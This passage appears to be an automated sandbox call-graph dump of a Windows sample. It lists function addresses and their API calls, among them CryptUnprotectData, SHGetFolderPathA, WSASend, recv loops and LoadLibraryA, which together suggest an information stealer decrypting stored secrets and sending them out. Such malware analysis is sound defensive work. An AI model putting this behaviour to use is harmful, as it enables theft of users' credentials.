ab85d0 8 API calls 90668->90669 90672 b4dca6 90669->90672 90670 b4e09e 90671 ab85d0 8 API calls 90670->90671 90671->90673 90674 ab85d0 8 API calls 90672->90674 90675 b86cf0 16 API calls 90673->90675 90677 b5140f 90674->90677 90676 b4e276 90675->90676 90678 b86cf0 16 API calls 90676->90678 90679 b4e3e9 90676->90679 90677->90359 90678->90679 90680 b875c0 17 API calls 90679->90680 90682 b4e567 90680->90682 90681 b65f80 GetLastError 90681->90700 90684 abb430 7 API calls 90682->90684 90816 b4e91e std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error std::_Facet_Register 90682->90816 90683 aa7cf0 GetLastError 90688 b514d6 90683->90688 90685 b4e5f2 90684->90685 90686 abaf80 GetLastError 90685->90686 90687 b4e691 90686->90687 90689 abaf80 GetLastError 90687->90689 90687->90816 90691 ab7ef0 GetLastError 90688->90691 90692 b4e732 90689->90692 90690 ab85d0 8 API calls 90690->90700 90693 b5160a 90691->90693 90694 abaf80 GetLastError 90692->90694 90696 abaf80 GetLastError 90693->90696 90695 b4e7c8 90694->90695 90697 abaf80 GetLastError 90695->90697 90695->90816 90702 b516e1 90696->90702 90698 b4e869 90697->90698 90699 abaf80 GetLastError 90698->90699 90701 b4e8ff 90699->90701 90700->90670 90700->90681 90700->90690 90807 b51024 std::_Throw_Cpp_error 90700->90807 91049 abb0e0 90701->91049 90705 b516ff SHGetFolderPathA 90702->90705 90704 b4e90d 91054 af8b00 6 API calls 90704->91054 90707 b51739 std::_Throw_Cpp_error 90705->90707 90708 b65f80 GetLastError 90707->90708 90778 b51aa0 std::ios_base::_Ios_base_dtor __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z std::_Facet_Register 90707->90778 90709 b51791 90708->90709 90710 b517b3 90709->90710 90727 b517ca std::_Throw_Cpp_error 90709->90727 90711 ab85d0 8 API calls 90710->90711 90712 b517c5 90711->90712 90715 ab85d0 8 API calls 90712->90715 90713 b51a8b 90714 ab85d0 8 API calls 90713->90714 90714->90778 90717 b533e9 90715->90717 90716->90654 90716->90658 90724 b86cf0 16 API calls 90716->90724 90717->90359 90718 b875c0 17 API calls 90718->90816 90719 b86cf0 16 API calls 90719->90816 90720 b65f80 GetLastError 90720->90727 90721 ab80a0 GetLastError 90721->90778 90722 ab85d0 8 API calls 90722->90727 90723 aa7cf0 GetLastError 90730 b534a9 std::_Throw_Cpp_error 90723->90730 90724->90716 90725 b53465 std::_Throw_Cpp_error 90726 aa7cf0 GetLastError 90725->90726 90726->90730 90727->90713 90727->90720 90727->90722 90754 b532cf std::_Throw_Cpp_error 90727->90754 90728 ac2100 6 API calls 90728->90816 90729 abdb10 7 API calls 90729->90816 90731 aa7cf0 GetLastError 90730->90731 90734 b5355e 90731->90734 90732 ab80a0 GetLastError 90732->90816 90733->90653 90733->90658 90739 b86cf0 16 API calls 90733->90739 90735 ab7ef0 GetLastError 90734->90735 90736 b535de 90735->90736 90738 abaf80 GetLastError 90736->90738 90737 b76710 14 API calls 90737->90778 90740 b536a6 90738->90740 90739->90733 90741 b536c4 SHGetFolderPathA 90740->90741 90744 b536fe std::_Throw_Cpp_error 90741->90744 90742 b76570 11 API calls 90742->90778 90746 b65f80 GetLastError 90744->90746 90757 b53c26 90744->90757 90745 ab7ef0 GetLastError 90745->90778 90748 b53756 90746->90748 90747 bead50 GetLastError GetLastError 90747->90778 90750 b53778 90748->90750 90785 b5378f std::_Throw_Cpp_error 90748->90785 90749 abaf80 GetLastError 90749->90816 90751 ab85d0 8 API calls 90750->90751 90774 b5378a 90751->90774 90752 b53c11 90753 ab85d0 8 API calls 90752->90753 90753->90757 90754->90723 90755 ab85d0 8 API calls 90761 b5830b 90755->90761 90756 abb0e0 GetLastError 90756->90816 90760 b86cf0 16 API calls 90757->90760 90759 b76710 14 API calls 90759->90816 90762 b53da6 90760->90762 90761->90359 90766 b86cf0 16 API calls 90762->90766 90767 b53f19 90762->90767 90763 b76570 11 API calls 90763->90816 90764 beb540 GetLastError GetLastError 90764->90816 90765 ac6db0 GetLastError 90765->90778 90766->90767 90768 b875c0 17 API calls 90767->90768 90773 b54097 90768->90773 90770 b65f80 GetLastError 90770->90785 90772 ae12f6 6 API calls 90772->90778 90775 abb430 7 API calls 90773->90775 90966 b54445 std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z std::_Facet_Register 90773->90966 90774->90755 90776 b54119 90775->90776 90779 abaf80 GetLastError 90776->90779 90777 ab85d0 8 API calls 90777->90785 90778->90712 90778->90721 90778->90725 90778->90730 90778->90737 90778->90742 90778->90745 90778->90747 90778->90754 90778->90765 90778->90772 90805 beb540 GetLastError GetLastError 90778->90805 91080 beae80 GetLastError GetLastError 90778->91080 90780 b541b8 90779->90780 90781 abaf80 GetLastError 90780->90781 90780->90966 90783 b54259 90781->90783 90782 ab7ef0 GetLastError 90782->90816 90784 abaf80 GetLastError 90783->90784 90786 b542ef 90784->90786 90785->90752 90785->90770 90785->90777 90787 abaf80 GetLastError 90786->90787 90786->90966 90789 b54390 90787->90789 90788 b51492 std::_Throw_Cpp_error 90791 aa7cf0 GetLastError 90788->90791 90790 abaf80 GetLastError 90789->90790 90792 b54426 90790->90792 90791->90688 90793 abb0e0 GetLastError 90792->90793 90795 b54434 90793->90795 90794 b583d7 std::_Throw_Cpp_error 90797 aa7cf0 GetLastError 90794->90797 91081 af8b00 6 API calls 90795->91081 90799 b58436 90797->90799 90801 ab7ef0 GetLastError 90799->90801 90800 bd2d60 GetLastError 90800->90816 90803 b584b4 90801->90803 90802 be7500 GetLastError GetLastError 90802->90816 90804 abaf80 GetLastError 90803->90804 90808 b5857c 90804->90808 90805->90778 90807->90683 90809 b5859a SHGetFolderPathA 90808->90809 90812 b585d4 std::_Throw_Cpp_error 90809->90812 90810 b875c0 17 API calls 90810->90966 90811 b86cf0 16 API calls 90811->90966 90813 b65f80 GetLastError 90812->90813 90825 b58959 90812->90825 90814 b5862c 90813->90814 90817 b5864e 90814->90817 90841 b58665 std::_Throw_Cpp_error 90814->90841 90815 b66420 26 API calls 90815->90816 90816->90672 90816->90688 90816->90718 90816->90719 90816->90728 90816->90729 90816->90732 90816->90749 90816->90756 90816->90759 90816->90763 90816->90764 90816->90782 90816->90788 90816->90800 90816->90802 90816->90807 90816->90815 90818 ac6db0 GetLastError 90816->90818 91055 af8b00 6 API calls 90816->91055 91056 bead50 90816->91056 91071 bd2de0 GetLastError 90816->91071 91072 b66a80 90816->91072 91079 beae80 GetLastError GetLastError 90816->91079 90819 ab85d0 8 API calls 90817->90819 90818->90816 90821 b58660 90819->90821 90820 b58944 90822 ab85d0 8 API calls 90820->90822 90824 ab85d0 8 API calls 90821->90824 90822->90825 90823 abb430 7 API calls 90823->90966 90830 b5de84 90824->90830 90826 b86cf0 16 API calls 90825->90826 90829 b58ad9 90826->90829 90827 b65f80 GetLastError 90827->90841 90828 b5df16 std::_Throw_Cpp_error 90832 aa7cf0 GetLastError 90828->90832 90833 b86cf0 16 API calls 90829->90833 90834 b58c4c 90829->90834 90830->90359 90831 abaf80 GetLastError 90831->90966 90840 b5df72 std::_Throw_Cpp_error 90832->90840 90833->90834 90836 b875c0 17 API calls 90834->90836 90835 ab85d0 8 API calls 90835->90841 90839 b58dca 90836->90839 90837 abb0e0 GetLastError 90837->90966 90842 abb430 7 API calls 90839->90842 90970 b5917b std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error std::_Facet_Register 90839->90970 90845 aa7cf0 GetLastError 90840->90845 90841->90820 90841->90827 90841->90828 90841->90835 90844 b58e4f 90842->90844 90843 aa7cf0 GetLastError 90843->90794 90846 abaf80 GetLastError 90844->90846 90851 b5dfc9 std::_Throw_Cpp_error 90845->90851 90847 b58eee 90846->90847 90848 abaf80 GetLastError 90847->90848 90847->90970 90849 b58f8f 90848->90849 90850 abaf80 GetLastError 90849->90850 90852 b59025 90850->90852 90854 aa7cf0 GetLastError 90851->90854 90853 abaf80 GetLastError 90852->90853 90852->90970 90855 b590c6 90853->90855 90862 b5e01d std::_Throw_Cpp_error 90854->90862 90856 abaf80 GetLastError 90855->90856 90858 b5915c 90856->90858 90857 b86cf0 16 API calls 90857->90970 90859 abb0e0 GetLastError 90858->90859 90860 b5916a 90859->90860 91084 af8b00 6 API calls 90860->91084 90863 aa7cf0 GetLastError 90862->90863 90865 b5e07d std::_Throw_Cpp_error 90863->90865 90864 b76710 14 API calls 90864->90966 90867 aa7cf0 GetLastError 90865->90867 90866 b875c0 17 API calls 90866->90970 90871 b5e0d2 std::_Throw_Cpp_error 90867->90871 90868 b76570 11 API calls 90868->90966 90869 beb540 GetLastError GetLastError 90869->90966 90872 aa7cf0 GetLastError 90871->90872 90875 b5e127 std::_Throw_Cpp_error 90872->90875 90873 abb430 7 API calls 90873->90970 90874 ab7ef0 GetLastError 90874->90966 90876 aa7cf0 GetLastError 90875->90876 90880 b5e182 std::_Throw_Cpp_error 90876->90880 90877 abaf80 GetLastError 90877->90970 90878 abb0e0 GetLastError 90878->90970 90882 aa7cf0 GetLastError 90880->90882 90881 b5ded2 std::_Throw_Cpp_error 90883 aa7cf0 GetLastError 90881->90883 90884 b5e1d7 std::_Throw_Cpp_error 90882->90884 90883->90828 90885 aa7cf0 GetLastError 90884->90885 90886 b5e22c std::_Throw_Cpp_error 90885->90886 90888 aa7cf0 GetLastError 90886->90888 90887 b76710 14 API calls 90887->90970 90890 b5e281 std::_Throw_Cpp_error 90888->90890 90889 beb540 GetLastError GetLastError 90889->90970 90894 aa7cf0 GetLastError 90890->90894 90891 b76570 11 API calls 90891->90970 90892 beae80 GetLastError GetLastError 90892->90970 90893 ab7ef0 GetLastError 90893->90970 90895 b5e2d6 std::_Throw_Cpp_error 90894->90895 90896 aa7cf0 GetLastError 90895->90896 90897 b5e32b 90896->90897 90898 ab7ef0 GetLastError 90897->90898 90899 b5e39a 90898->90899 90900 abaf80 GetLastError 90899->90900 90902 b5e506 90900->90902 90901 bead50 GetLastError GetLastError 90901->90970 90903 b5e524 SHGetFolderPathA 90902->90903 90905 b5e55e std::_Throw_Cpp_error 90903->90905 90904 ac6db0 GetLastError 90904->90966 90906 b65f80 GetLastError 90905->90906 90990 b5e8c0 std::ios_base::_Ios_base_dtor std::_Facet_Register 90905->90990 90907 b5e5b6 90906->90907 90908 b5e5d8 90907->90908 90926 b5e5ef std::_Throw_Cpp_error 90907->90926 90909 ab85d0 8 API calls 90908->90909 90910 b5e5ea 90909->90910 90915 ab85d0 8 API calls 90910->90915 90911 b5e8ab 90913 ab85d0 8 API calls 90911->90913 90912 bead50 GetLastError GetLastError 90912->90966 90913->90990 90918 b5fe8c 90915->90918 90916 b65f80 GetLastError 90916->90926 90917 ac6db0 GetLastError 90917->90970 90918->90359 90919 ab85d0 8 API calls 90919->90926 90920 aa7cf0 GetLastError 90927 b5ff4c std::_Throw_Cpp_error 90920->90927 90921 ab80a0 GetLastError 90921->90990 90923 b5ff08 std::_Throw_Cpp_error 90924 aa7cf0 GetLastError 90923->90924 90924->90927 90925 bd2d60 GetLastError 90925->90970 90926->90911 90926->90916 90926->90919 90958 b5fd8b std::_Throw_Cpp_error 90926->90958 90930 aa7cf0 GetLastError 90927->90930 90928 b66a80 2 API calls 90928->90970 90929 be7500 GetLastError GetLastError 90929->90970 90931 b60001 90930->90931 90933 ab7ef0 GetLastError 90931->90933 90934 b6007a 90933->90934 90935 b66420 26 API calls 90935->90970 90938 b76710 14 API calls 90938->90990 90939 be7500 GetLastError GetLastError 90939->90966 90942 ab7ef0 GetLastError 90942->90990 90943 b66a80 2 API calls 90943->90966 90944 b76570 11 API calls 90944->90990 90948 ac6db0 GetLastError 90948->90990 90950 bead50 GetLastError GetLastError 90950->90990 90958->90920 90959 ab80a0 GetLastError 90959->90966 90964 b581ff std::_Throw_Cpp_error 90964->90843 90965 ab80a0 GetLastError 90965->90970 90966->90774 90966->90794 90966->90810 90966->90811 90966->90823 90966->90831 90966->90837 90966->90864 90966->90868 90966->90869 90966->90874 90966->90904 90966->90912 90966->90939 90966->90943 90966->90959 90966->90964 91006 ae12f6 90966->91006 91012 beb9b0 90966->91012 91023 bd2d60 90966->91023 91034 b66420 90966->91034 91082 af8b00 6 API calls 90966->91082 91083 beae80 GetLastError GetLastError 90966->91083 90970->90821 90970->90828 90970->90840 90970->90851 90970->90857 90970->90862 90970->90865 90970->90866 90970->90871 90970->90873 90970->90875 90970->90877 90970->90878 90970->90880 90970->90881 90970->90884 90970->90886 90970->90887 90970->90889 90970->90890 90970->90891 90970->90892 90970->90893 90970->90895 90970->90901 90970->90917 90970->90925 90970->90928 90970->90929 90970->90935 90970->90965 91085 af8b00 6 API calls 90970->91085 91086 bd2de0 GetLastError 90970->91086 90990->90910 90990->90921 90990->90923 90990->90927 90990->90938 90990->90942 90990->90944 90990->90948 90990->90950 90990->90958 90992 beb540 GetLastError GetLastError 90990->90992 91087 beae80 GetLastError GetLastError 90990->91087 90992->90990 91004 b65ff2 std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 91002->91004 91003 b663cd GetLastError 91003->91004 91005 b663dc 91003->91005 91004->91003 91004->91005 91005->90651 91007 ae130a __fread_nolock 91006->91007 91089 addefa 91007->91089 91009 ae1324 91010 ad899c __fread_nolock 6 API calls 91009->91010 91011 ae1333 91010->91011 91011->90966 91013 beb9bb 91012->91013 91014 beba14 91012->91014 91016 beb9cd 91013->91016 91020 beb9f2 91013->91020 91118 bd2de0 GetLastError 91014->91118 91117 bd2de0 GetLastError 91016->91117 91017 be7500 2 API calls 91017->91014 91018 beb9ee 91021 be7500 2 API calls 91018->91021 91022 beba4a 91018->91022 91020->91014 91020->91017 91021->91022 91022->90966 91024 bd2d6d 91023->91024 91033 bd2da7 91023->91033 91025 bd2d8b 91024->91025 91024->91033 91119 bd8150 GetLastError 91024->91119 91027 bd2da9 91025->91027 91028 bd2d91 91025->91028 91122 bd8050 GetLastError 91027->91122 91029 bd2da0 91028->91029 91120 be7690 GetLastError 91028->91120 91121 bd8100 GetLastError 91029->91121 91033->90966 91035 b664e4 91034->91035 91036 b66a80 2 API calls 91035->91036 91048 b665ba std::ios_base::_Ios_base_dtor 91035->91048 91037 b6665a 91036->91037 91038 b66681 91037->91038 91039 b66729 91037->91039 91123 af8e30 6 API calls std::ios_base::_Ios_base_dtor 91038->91123 91152 af8e30 6 API calls std::ios_base::_Ios_base_dtor 91039->91152 91042 b667c5 91153 af8e30 6 API calls std::ios_base::_Ios_base_dtor 91042->91153 91043 b666aa 91124 af8e30 6 API calls std::ios_base::_Ios_base_dtor 91043->91124 91046 b666be 91125 b66d00 91046->91125 91048->90966 91050 abb159 91049->91050 91051 abb18a std::_Throw_Cpp_error 91049->91051 91050->90704 91052 aa7cf0 GetLastError 91051->91052 91053 abb1c2 91052->91053 91054->90816 91055->90816 91057 bead5b 91056->91057 91058 bead6d 91056->91058 91057->91058 91060 be7500 2 API calls 91057->91060 91059 beade1 91058->91059 91065 bead8d 91058->91065 91177 bd8150 GetLastError 91058->91177 91062 beadff 91059->91062 91063 beade7 91059->91063 91060->91058 91180 bd8050 GetLastError 91062->91180 91066 beadf6 91063->91066 91178 be7690 GetLastError 91063->91178 91069 be7500 2 API calls 91065->91069 91070 beae3f 91065->91070 91179 bd8100 GetLastError 91066->91179 91069->91070 91070->90816 91071->90816 91074 b66ab7 91072->91074 91073 b66ac2 CryptUnprotectData 91073->91074 91075 b66ae8 std::ios_base::_Ios_base_dtor std::locale::_Locimp::_Locimp 91073->91075 91074->91073 91074->91075 91076 ae1c96 ___std_exception_destroy GetLastError 91075->91076 91077 b66b0c std::_Throw_Cpp_error 91075->91077 91078 b66bfc 91076->91078 91077->90816 91078->90816 91079->90816 91080->90778 91081->90966 91082->90966 91083->90966 91084->90970 91085->90970 91086->90970 91087->90990 91105 adce79 91089->91105 91091 addf55 91092 addf7a 91091->91092 91111 ade1d0 6 API calls __fread_nolock 91091->91111 91112 adce94 6 API calls 2 library calls 91092->91112 91093 addf0d 91093->91091 91094 addf22 91093->91094 91104 addf3d 91093->91104 91110 ad8be3 5 API calls __fread_nolock 91094->91110 91099 addfb8 91103 ade043 __aulldiv 91099->91103 91114 adce22 6 API calls __fread_nolock 91099->91114 91100 addf8f 91100->91099 91113 adce94 6 API calls 2 library calls 91100->91113 91115 adce22 6 API calls __fread_nolock 91103->91115 91104->91009 91106 adce7e 91105->91106 91107 adce91 91105->91107 91116 ad8c60 6 API calls __fread_nolock 91106->91116 91107->91093 91109 adce8e 91109->91093 91110->91104 91111->91092 91112->91100 91113->91100 91114->91103 91115->91104 91116->91109 91117->91018 91118->91018 91119->91025 91120->91029 91121->91033 91122->91033 91123->91043 91124->91046 91130 b66f84 91125->91130 91135 b66d62 91125->91135 91126 ad2b99 GetSystemTimePreciseAsFileTime 91127 b66d6c 91126->91127 91128 b66d77 91127->91128 91129 b66fcf 91127->91129 91131 b66fd6 91128->91131 91137 b66d87 91128->91137 91132 ad2534 std::_Throw_Cpp_error 8 API calls 91129->91132 91130->91135 91176 ad38de 6 API calls 91130->91176 91133 ad2534 std::_Throw_Cpp_error 8 API calls 91131->91133 91132->91131 91136 b66fe7 std::_Throw_Cpp_error 91133->91136 91135->91126 91154 b87440 91136->91154 91139 aa9280 2 API calls 91137->91139 91143 b66e69 91139->91143 91140 b66f35 std::_Throw_Cpp_error 91142 ad2baa GetSystemTimePreciseAsFileTime 91140->91142 91141 b66e92 GetPEB 91141->91143 91144 b66f53 91142->91144 91143->91140 91143->91141 91144->91048 91145 b67058 91168 aa9280 91145->91168 91147 b67299 91172 aa8f20 91147->91172 91149 b672e9 91152->91042 91153->91048 91155 b87490 91154->91155 91156 ad9820 6 API calls 91155->91156 91157 b87520 91156->91157 91158 add5f6 14 API calls 91157->91158 91160 b87594 91157->91160 91159 b87533 91158->91159 91161 ad93ab 7 API calls 91159->91161 91160->91145 91162 b8753c 91161->91162 91163 add5f6 14 API calls 91162->91163 91164 b8754b 91163->91164 91165 ae209f __fread_nolock 8 API calls 91164->91165 91166 b8758e 91165->91166 91167 add0a8 16 API calls 91166->91167 91167->91160 91169 aa92d4 std::_Throw_Cpp_error 91168->91169 91170 aa96ac GetProcAddress WSASend 91169->91170 91171 aa96e2 std::ios_base::_Ios_base_dtor 91169->91171 91170->91169 91170->91171 91171->91147 91173 aa8f7a 91172->91173 91174 aa9202 91173->91174 91175 aa91ce GetProcAddress WSASend 91173->91175 91174->91149 91175->91173 91175->91174 91176->91135 91177->91059 91178->91066 91179->91065 91180->91065 91181 b67a80 91189 b67e4c 91181->91189 91191 b67abe std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 91181->91191 91182 b67b2c recv 91182->91191 91183 b67e37 Sleep 91183->91189 91183->91191 91184 b67d95 recv 91186 b67e2f Sleep 91184->91186 91186->91183 91187 b67bad recv 91188 b67bce recv 91187->91188 91187->91191 91188->91191 91190 aa9280 2 API calls 91190->91191 91191->91182 91191->91183 91191->91184 91191->91186 91191->91187 91191->91189 91191->91190 91192 b67c85 recv 91191->91192 91194 b67e70 91191->91194 91234 ad3069 91191->91234 91192->91191 91195 b67ebe std::_Throw_Cpp_error 91194->91195 91196 b67eec 91194->91196 91197 aa9280 2 API calls 91195->91197 91198 b67f5d 91196->91198 91199 b67f7b 91196->91199 91222 b67ee4 91196->91222 91197->91222 91260 ae12b7 91198->91260 91201 b68240 91199->91201 91202 b67f9b 91199->91202 91199->91222 91204 b6829b 91201->91204 91205 b68248 91201->91205 91237 aa5400 91202->91237 91206 b682f6 91204->91206 91207 b682a3 91204->91207 91208 abb430 7 API calls 91205->91208 91210 b68351 91206->91210 91211 b682fe 91206->91211 91209 abb430 7 API calls 91207->91209 91208->91222 91209->91222 91214 b683ac 91210->91214 91215 b68359 91210->91215 91212 abb430 7 API calls 91211->91212 91212->91222 91213 b6815d 91218 ad2baa GetSystemTimePreciseAsFileTime 91213->91218 91216 b68404 91214->91216 91217 b683b4 91214->91217 91219 abb430 7 API calls 91215->91219 91216->91222 91270 af8b00 6 API calls 91216->91270 91220 abb430 7 API calls 91217->91220 91218->91222 91219->91222 91220->91222 91222->91191 91223 b67fc0 std::_Throw_Cpp_error 91223->91213 91247 b76240 91223->91247 91225 b680c0 91226 b68132 std::_Throw_Cpp_error 91225->91226 91227 b68165 91225->91227 91256 b6f200 91226->91256 91228 ad9820 6 API calls 91227->91228 91230 b681c7 91228->91230 91230->91213 91264 ae1628 91230->91264 91233 add0a8 16 API calls 91233->91213 91349 ad361d 91234->91349 91236 ad3077 91236->91191 91238 ad2b99 GetSystemTimePreciseAsFileTime 91237->91238 91239 aa5409 91238->91239 91240 aa5410 91239->91240 91242 ad2534 std::_Throw_Cpp_error 8 API calls 91239->91242 91241 aa5419 91240->91241 91243 ad2534 std::_Throw_Cpp_error 8 API calls 91240->91243 91241->91223 91242->91240 91244 aa5430 91243->91244 91271 ad953c 91244->91271 91248 b762d8 91247->91248 91255 b762e1 91247->91255 91301 abe4b0 GetLastError Concurrency::cancel_current_task std::_Throw_Cpp_error std::_Facet_Register 91248->91301 91251 b76500 std::ios_base::_Ios_base_dtor 91251->91225 91252 b764cf 91252->91251 91253 ad3069 __Xtime_get_ticks GetSystemTimePreciseAsFileTime 91252->91253 91254 b76556 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 91253->91254 91254->91225 91255->91252 91292 b946c0 91255->91292 91257 b6f254 std::_Throw_Cpp_error 91256->91257 91302 aa3440 7 API calls 91257->91302 91259 b6f47a 91261 ae12ca __fread_nolock 91260->91261 91262 ad899c __fread_nolock 6 API calls 91261->91262 91263 ae12f1 91262->91263 91263->91222 91265 ae163b __fread_nolock 91264->91265 91303 ae140a 91265->91303 91267 ae1650 91268 ad899c __fread_nolock 6 API calls 91267->91268 91269 ae165d 91268->91269 91269->91233 91270->91222 91272 ad954f __fread_nolock 91271->91272 91277 ad93db 91272->91277 91274 ad955e 91275 ad899c __fread_nolock 6 API calls 91274->91275 91276 aa5450 91275->91276 91276->91223 91278 ad93e7 __fread_nolock 91277->91278 91279 ad93f0 91278->91279 91281 ad9414 __fread_nolock 91278->91281 91289 ad8be3 5 API calls __fread_nolock 91279->91289 91282 aea1e9 __fread_nolock 6 API calls 91281->91282 91285 ad9432 91281->91285 91282->91285 91283 ad94cf 91291 ad9507 6 API calls __fread_nolock 91283->91291 91284 ad949e 91290 ad8be3 5 API calls __fread_nolock 91284->91290 91285->91283 91285->91284 91288 ad9409 91288->91274 91289->91288 91290->91288 91291->91288 91293 b946c7 91292->91293 91299 b946cc std::locale::_Locimp::_Locimp 91292->91299 91293->91255 91294 b94722 91294->91255 91295 b947d7 91295->91255 91296 ae1c96 ___std_exception_destroy GetLastError 91297 b947c7 91296->91297 91297->91255 91298 b94781 91298->91295 91298->91296 91299->91294 91299->91298 91300 ae1c96 ___std_exception_destroy GetLastError 91299->91300 91300->91298 91301->91255 91302->91259 91304 ae1418 91303->91304 91305 ae1440 91303->91305 91304->91305 91306 ae1447 91304->91306 91307 ae1425 91304->91307 91305->91267 91311 ae1363 91306->91311 91317 ad8be3 5 API calls __fread_nolock 91307->91317 91312 ae136f __fread_nolock 91311->91312 91318 ae13be 91312->91318 91316 ae139b 91316->91267 91317->91305 91326 aec8aa 91318->91326 91324 ae138a 91325 ae13b2 6 API calls __fread_nolock 91324->91325 91325->91316 91341 aec86c 91326->91341 91328 ae13d6 91331 ae1481 91328->91331 91329 aec8bb std::_Locinfo::_Locinfo_dtor 91329->91328 91330 aeb01a ___std_exception_destroy GetLastError 91329->91330 91330->91328 91332 ae13f4 91331->91332 91335 ae1493 91331->91335 91340 aec955 14 API calls 91332->91340 91333 ae14a1 91348 ad8be3 5 API calls __fread_nolock 91333->91348 91335->91332 91335->91333 91337 ae14d7 91335->91337 91336 ad9a91 14 API calls 91336->91337 91337->91332 91337->91336 91338 aea1e9 __fread_nolock 6 API calls 91337->91338 91339 ae9678 14 API calls 91337->91339 91338->91337 91339->91337 91340->91324 91342 aec878 91341->91342 91343 aec8a2 91342->91343 91344 aea1e9 __fread_nolock 6 API calls 91342->91344 91343->91329 91345 aec893 91344->91345 91346 af3be3 __fread_nolock 6 API calls 91345->91346 91347 aec899 91346->91347 91347->91329 91348->91332 91350 ad364d GetSystemTimePreciseAsFileTime 91349->91350 91351 ad3659 91349->91351 91350->91351 91351->91236 91353 aa67d0 91354 aa680f std::_Throw_Cpp_error 91353->91354 91357 aa5ff0 91354->91357 91356 aa682a 91358 aa36e0 std::_Throw_Cpp_error GetLastError 91357->91358 91359 aa6033 91358->91359 91359->91359 91362 aa6180 91359->91362 91361 aa60f1 std::ios_base::_Ios_base_dtor 91361->91356 91372 ad1e08 6 API calls __Getctype 91362->91372 91364 aa61fe 91373 aba7c0 91364->91373 91366 aa621a 91367 aba7c0 10 API calls 91366->91367 91368 aa6241 std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 91367->91368 91370 aa640a std::ios_base::_Ios_base_dtor 91368->91370 91384 ad4b78 GetLastError ___std_exception_destroy 91368->91384 91370->91361 91371 aa658c std::ios_base::_Ios_base_dtor 91371->91361 91372->91364 91374 aba841 91373->91374 91375 aba8a0 91373->91375 91378 aba89c 91374->91378 91390 ad1f0c GetLastError GetLastError 91374->91390 91375->91366 91377 aba856 91377->91378 91391 ad1f0c GetLastError GetLastError 91377->91391 91378->91375 91385 aa6870 91378->91385 91382 aba941 std::_Facet_Register 91392 ad1f9c 7 API calls __Getctype 91382->91392 91383 abaa53 91383->91366 91384->91371 91386 aa689b 91385->91386 91388 aa692b 91386->91388 91393 aa6840 91386->91393 91388->91382 91390->91377 91391->91378 91392->91383 91394 aa684d 91393->91394 91396 aa6867 91394->91396 91397 ad1f7b 91394->91397 91396->91382 91398 ad1f89 91397->91398 91399 ad1f8e 91398->91399 91400 ad1f92 GetLastError 91398->91400 91399->91394 91400->91399 91401 ae1e53 91402 ae1e6d 91401->91402 91404 ae1e81 91401->91404 91407 ad8c60 6 API calls __fread_nolock 91402->91407 91406 ae1e7d _ValidateLocalCookies 91404->91406 91408 aee2a0 6 API calls 2 library calls 91404->91408 91407->91406 91408->91406 91409 6260218 91415 6260232 91409->91415 91410 62602e7 91412 6260313 91410->91412 91417 6bb5b52 91410->91417 91411 6260288 LoadLibraryA 91413 6260308 91411->91413 91411->91415 91415->91410 91415->91411 91415->91413 91418 6bb5b5b 91417->91418 91419 6bb5b60 91417->91419 91438 6bb61d2 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 91418->91438 91423 6bb5a1c 91419->91423 91425 6bb5a28 ___scrt_is_nonwritable_in_current_image 91423->91425 91424 6bb5a51 dllmain_raw 91426 6bb5a6b dllmain_crt_dispatch 91424->91426 91435 62602ff 91424->91435 91425->91424 91427 6bb5a4c 91425->91427 91425->91435 91426->91427 91426->91435 91439 6b9d540 91427->91439 91438->91419 91440 6b9d69f __DllMainCRTStartup@12 91439->91440 91468 6ba2fc0 91440->91468 91442 6b9d704 __DllMainCRTStartup@12 91442->91442 91443 6ba2fc0 __DllMainCRTStartup@12 43 API calls 91442->91443 91444 6b9d79b 91443->91444 91474 6b797e0 91444->91474 91449 6b9e960 __DllMainCRTStartup@12 43 API calls 91450 6b9d828 __DllMainCRTStartup@12 91449->91450 91451 6b9db37 91450->91451 91497 6b9eba0 91450->91497 91511 6b9c990 SetThreadExecutionState 91451->91511 91460 6b797e0 __DllMainCRTStartup@12 43 API calls 91461 6b9da8e 91460->91461 91462 6b9db28 91461->91462 91463 6b9e960 __DllMainCRTStartup@12 43 API calls 91461->91463 91505 6b9f380 91462->91505 91465 6b9daf8 91463->91465 91466 6b9e960 __DllMainCRTStartup@12 43 API calls 91465->91466 91466->91462 91469 6ba2fd7 __DllMainCRTStartup@12 91468->91469 91471 6ba2fe1 __DllMainCRTStartup@12 91469->91471 91543 6b71c20 43 API calls std::_Xinvalid_argument 91469->91543 91473 6ba2ffa ctype 91471->91473 91544 6ba5fa0 43 API calls 2 library calls 91471->91544 91473->91442 91475 6b79821 __DllMainCRTStartup@12 std::exception::exception 91474->91475 91476 6b798be 91475->91476 91488 6b9f800 std::_Throw_Cpp_error 41 API calls 91475->91488 91549 6ba0130 43 API calls __DllMainCRTStartup@12 91475->91549 91550 6ba24a0 43 API calls __DllMainCRTStartup@12 91475->91550 91477 6b79925 91476->91477 91478 6b798e2 91476->91478 91492 6b79923 91477->91492 91553 6ba24f0 43 API calls __DllMainCRTStartup@12 91477->91553 91551 6ba0130 43 API calls __DllMainCRTStartup@12 91478->91551 91481 6b798f8 91552 6ba24a0 43 API calls __DllMainCRTStartup@12 91481->91552 91486 6b79949 91489 6b9f800 std::_Throw_Cpp_error 41 API calls 91486->91489 91487 6b79917 91490 6b9f800 std::_Throw_Cpp_error 41 API calls 91487->91490 91488->91475 91491 6b79955 91489->91491 91490->91492 91493 6b9e960 91491->91493 91545 6b9f800 91492->91545 91494 6b9e97f 91493->91494 91496 6b9d7f5 91493->91496 91555 6b9fe30 43 API calls 3 library calls 91494->91555 91496->91449 91498 6b9ec0a 91497->91498 91498->91498 91499 6ba2fc0 __DllMainCRTStartup@12 43 API calls 91498->91499 91500 6b9da59 91499->91500 91501 6b9ecf0 91500->91501 91502 6b9ed87 91501->91502 91556 6ba3130 91502->91556 91504 6b9da78 91504->91460 91506 6b9f3d4 error_info_injector 91505->91506 91509 6b9f463 error_info_injector 91505->91509 91507 6b9f41c 91506->91507 91508 6b9f800 std::_Throw_Cpp_error 41 API calls 91506->91508 91507->91509 91564 6b71b70 41 API calls _Allocate 91507->91564 